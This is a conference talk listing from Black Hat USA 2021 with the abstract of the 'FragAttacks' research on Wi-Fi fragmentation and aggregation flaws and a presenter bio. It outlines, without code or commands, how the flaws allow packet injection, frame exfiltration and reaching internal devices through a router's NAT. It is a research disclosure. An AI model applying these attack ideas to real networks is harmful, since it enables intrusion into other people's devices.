FragAttacks: Breaking Wi-Fi through Fragmentation and Aggregation

Presented at Black Hat USA 2021, Aug. 5, 2021, 10:20 a.m. (40 minutes)

This presentation introduces three novel security-related design flaws in Wi-Fi and various widespread implementation flaws. An adversary can abuse these to inject packets or exfiltrate selected frames. As an example, it will be demonstrated how packet injection can be used to punch a hole in the router's NAT so the adversary can connect to and exploit internal devices in the network (e.g. BlueKeep against Windows 7).

The first design flaw is present in Wi-Fi's frame aggregation feature where a flag in the Wi-Fi header is not properly protected. The other two design flaws are present in Wi-Fi's frame fragmentation feature where the receiver improperly verifies and manages fragments. Although these design flaws can be non-trivial to exploit, they affect all protected Wi-Fi networks. Some design flaws even affect the ancient WEP protocol meaning these flaws have been part of Wi-Fi since 1997.

In practice, the implementation vulnerabilities are the most concerning. Several are widespread and trivial to exploit. For example, some devices accept plaintext frames in a protected Wi-Fi network and others accept plaintext aggregated frames that resemble handshake messages. The resulting attacks will be demonstrated, such as turning an IoT power socket on and off, and a tool will be released that can be used to test Wi-Fi products against all the discovered vulnerabilities.


Presenters:

  • Mathy Vanhoef - Postdoctoral Researcher, New York University Abu Dhabi
    Mathy Vanhoef is a postdoctoral researcher at New York University Abu Dhabi. He previously discovered the KRACK attack against WPA2, the RC4 NOMORE attack against RC4, and the Dragonblood attack against WPA3. His research interest lies in computer security with a focus on network and wireless security (e.g. Wi-Fi), software security, and applied cryptography. In these areas, Mathy tries to bridge the gap between real-world code and (protocol) standards.

Links:

Similar Presentations: